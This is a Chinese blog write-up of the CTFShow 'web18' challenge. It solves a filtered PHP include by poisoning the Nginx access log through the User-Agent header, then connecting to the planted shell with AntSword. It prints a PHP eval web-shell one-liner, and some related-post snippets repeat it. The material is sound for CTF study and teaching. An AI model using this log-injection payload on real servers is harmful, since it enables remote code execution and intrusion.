【CTF Web】CTFShow web18 Writeup(文件包含漏洞+日志注入+RCE)

最新推荐文章于 2024-09-12 09:45:11 发布
最新推荐文章于 2024-09-12 09:45:11 发布
阅读量256 收藏 3
点赞数 5
分类专栏: CTF Writeup 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138027143
版权

web18

1
阿呆加入了过滤,这下完美了。

解法

<?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

用 dirsearch 扫了下,什么都没找到。

Wappalyzer 检测到 Nginx。

访问:

https://da6431fa-8244-4749-890b-de7645eb4066.challenge.ctf.show/?c=/var/log/nginx/access.log

Nginx 服务器的访问日志文件会存储 User-Agent。

用 burp 抓包,在 User-Agent 中添加一句话木马:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 <?php eval($_POST['a']); ?>

使用蚁剑连接,URL:

https://da6431fa-8244-4749-890b-de7645eb4066.challenge.ctf.show/?c=/var/log/nginx/access.log

找到 flag。

Flag

ctfshow{fedc9b1e-c03f-4665-8f06-de6ef24eca59}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
专栏目录
CTFshow 信息收集 web18
Kradress的博客
10-23 1410
根据提示 不要着急,休息,休息一会儿,玩101分给你flag 打开是一个小游戏,要么玩到101分,要么直接作弊 查看源代码,发现js文件 里面发现有个score=0,只要它为101就应该能得到flag了吧 ctrl+F搜索score在最底下 发现score>100,发现一段Unicode编码 解码得到,谐音就是访问 110.php,拿到flag ...
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3985
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
CTF-show WEB入门--web18
m0_73912575的博客
02-06 630
CTF-show WEB入门--web18
文件包含】——日志文件注入
最新发布
qq_74350234的博客
09-12 759
本文主要根据做题内容的总结,如有错误之处,还请各位师傅指正。
CTFSHOW系列-web18(信息收集-js源码信息泄露)
siu~
12-02 477
CTFSHOW系列解题思路
ctfshow信息收集Web18(玩游戏)
m0_62584974的博客
04-07 3799
不要着急,休息,休息一会儿,玩101分给你flag 点进去是一个游戏 查看游戏的js代码 查看js代码 查看通过游戏后会展示的内容是一个Unicode编码的 查看 110.php 得到Flag
ctf_show笔记篇(web入门---文件包含
whale_waves的博客
03-02 1228
原:file=php://filter/write=convert.base64-decode/resource=a.php。url转换两次后:####浏览器会先自动url解码一次,第二次则是urldecode。原content=
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 767
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
code blue CTF 2019 fopen RCE 漏洞Writeup
systemino的博客
11-22 585
0x01 介绍 最近,我在打CODE BLUE CTF 2019决赛,里面有一道题目是通过fopen的第二个参数进行RCE,奇热在这篇文章我会详细说明解这道题目的方法。 首先,将下面两个文件放在/home/user目录: gconv-modules modulePAYLOAD//INTERNAL../../../../../../../../home/user/pa...
ctfshow吃瓜杯 web writeup
ashMOB的博客
11-16 945
ctfshow吃瓜杯 web writeup shellme 进去就是phpinfo,Ctrl+f搜一下就行 热身 简单的代码审计 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){
[极客大挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 457
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
日志注入 ctf.show_web4
m0_56107268的博客
05-13 542
使用php://input 不行 使用日志注入 查看日志的默认目录,得到了日志文件 ?url=/var/log/nginx/access.log 进行日志注入 <?php @eval($_POST['a']);?> 使用蚁剑连接得到flag
CTFshow_萌新计划_web1-21
ScyLamb的博客
01-04 3575
0x01 web1 关键代码: if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id
CTFshow_萌新(web
果粒程
01-09 602
CTFshow_萌新(web
ctfshow-web入门信息搜集(小宇特详解)
小宇的web博客
04-22 3784
ctfshow-web入门信息搜集 web1-源码 这个就比较简单了,直接f12去进行查看源码就找到了源码。 web2-js前台拦截 这里有4种方法,第一种方法是直接禁用JavaScript,这个就自行搜索吧。我这里说一下火狐的禁用JavaScript。 1.先开一个新的标签页,然后在Firefox的地址栏里输入,about:config , 然后按enter键进行检索。 2.这里会弹出三思而后行,直接确定,然后在搜索栏搜索javascript.enabled,这时显示的ture,然后点击右边的箭头,这时就
CTFshow 信息收集 web16 17 18 19 20
ChenD的学习笔记
11-07 739
CTFshow web16 web17 web18 web19 web20
ctfshow 萌新web1-21
akxnxbshai的博客
07-29 1426
ctfshow 萌新题 web1-21
ctfshow-web4(文件包含&日志注入
Welcome To Myon'Blog !
10-08 2007
Nginx中的日志分两种,一种是error.log,一种是access.log。中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log。进入后台,找到flag。
CTF挑战:Web安全漏洞——任意文件上传与下载实战
CTF(Capture The Flag)竞赛中,特别是在Web安全领域,"任意文件上传+任意文件下载"是一个常见的挑战,涉及到黑客技术的运用和Web应用程序的安全漏洞利用。这类题目通常要求参赛者通过精心构造的HTTP请求,上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值